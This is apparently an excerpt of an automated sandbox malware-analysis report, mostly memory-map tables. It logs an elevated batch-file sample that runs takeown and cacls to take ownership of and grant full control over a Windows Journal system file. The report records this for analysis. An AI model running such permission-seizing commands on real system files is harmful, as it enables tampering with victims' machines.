| pagefile_0x0000000000260000 | 0x00260000 | 0x00260fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x00271fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00300000 | 0x003bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0052ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0062ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007c0000 | 0x007c0000 | 0x007cffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x007d0000 | 0x00b06fff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x74540000 | 0x74547fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f2c0000 | 0x7f2c0000 | 0x7f3bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f3c0000 | 0x7f3c0000 | 0x7f3e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f3e5000 | 0x7f3e5000 | 0x7f3e5fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3e7000 | 0x7f3e7000 | 0x7f3e9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3ea000 | 0x7f3ea000 | 0x7f3ecfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3ed000 | 0x7f3ed000 | 0x7f3edfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | vIDhS3md.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 81 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 60 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 21 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 200, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x968, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x96c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe | os_pid = 0x2dc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "jnwdui.dll.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "jnwdui.dll.mui" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #23: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #23 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:35, Reason: Child Process |
| Unmonitor | End Time: 00:03:37, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x968 |
| Parent PID | 0x578 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
994
0x
978
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x000dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00101fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x0025ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00d70000 | 0x00d79fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d80000 | 0x00d80000 | 0x04d7ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ecb0000 | 0x7ecb0000 | 0x7ecd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ecd5000 | 0x7ecd5000 | 0x7ecd5fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ecd6000 | 0x7ecd6000 | 0x7ecd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ecdd000 | 0x7ecdd000 | 0x7ecdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #24: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #24 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:36, Reason: Child Process |
| Unmonitor | End Time: 00:03:39, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x96c |
| Parent PID | 0x578 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
99C
0x
904
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00170000 | 0x0017ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000b10000 | 0x00b10000 | 0x04b0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004b10000 | 0x04b10000 | 0x04b2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b10000 | 0x04b10000 | 0x04b1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004b20000 | 0x04b20000 | 0x04b23fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b30000 | 0x04b30000 | 0x04b31fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x04b30000 | 0x04b34fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004b40000 | 0x04b40000 | 0x04b53fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b60000 | 0x04b60000 | 0x04b9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ba0000 | 0x04ba0000 | 0x04bdffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004be0000 | 0x04be0000 | 0x04be3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004bf0000 | 0x04bf0000 | 0x04bf0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004c00000 | 0x04c00000 | 0x04c01fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c10000 | 0x04c10000 | 0x04c10fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c20000 | 0x04c20000 | 0x04c20fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c30000 | 0x04c30000 | 0x04c3ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04c40000 | 0x04cfdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004d00000 | 0x04d00000 | 0x04d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d60000 | 0x04d60000 | 0x04e5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e60000 | 0x04e60000 | 0x04e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f60000 | 0x04f60000 | 0x04f6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f70000 | 0x04f70000 | 0x050f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005100000 | 0x05100000 | 0x05280fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005290000 | 0x05290000 | 0x0668ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06690000 | 0x069c6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74480000 | 0x744a7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e9a0000 | 0x7e9a0000 | 0x7ea9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eaa0000 | 0x7eaa0000 | 0x7eac2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eac6000 | 0x7eac6000 | 0x7eac8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eac9000 | 0x7eac9000 | 0x7eac9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eaca000 | 0x7eaca000 | 0x7eaccfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eacd000 | 0x7eacd000 | 0x7eacdfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #25: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #25 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Journal\Templates\Genko_1.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:38, Reason: Child Process |
| Unmonitor | End Time: 00:04:43, Reason: Self Terminated |
| Monitor Duration | 00:01:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa40 |
| Parent PID | 0xbd0 (c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A48
0x
E90
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000007a0000 | 0x007a0000 | 0x007bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x007affff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x007b3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007c0000 | 0x007c0000 | 0x007c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007c0000 | 0x007c0000 | 0x007c3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x007e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007f0000 | 0x007f0000 | 0x0082ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000830000 | 0x00830000 | 0x0092ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000930000 | 0x00930000 | 0x00933fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000940000 | 0x00940000 | 0x00940fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000950000 | 0x00950000 | 0x00951fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000960000 | 0x00960000 | 0x0096ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000980000 | 0x00980000 | 0x0098ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00990000 | 0x00a4dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000a50000 | 0x00a50000 | 0x00a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000aa0000 | 0x00aa0000 | 0x00b9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ba0000 | 0x00ba0000 | 0x00c9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000df0000 | 0x00df0000 | 0x00dfffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00e00000 | 0x01136fff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x74540000 | 0x74547fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ea00000 | 0x7ea00000 | 0x7eafffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eb00000 | 0x7eb00000 | 0x7eb22fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eb28000 | 0x7eb28000 | 0x7eb2afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb2b000 | 0x7eb2b000 | 0x7eb2dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb2e000 | 0x7eb2e000 | 0x7eb2efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb2f000 | 0x7eb2f000 | 0x7eb2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
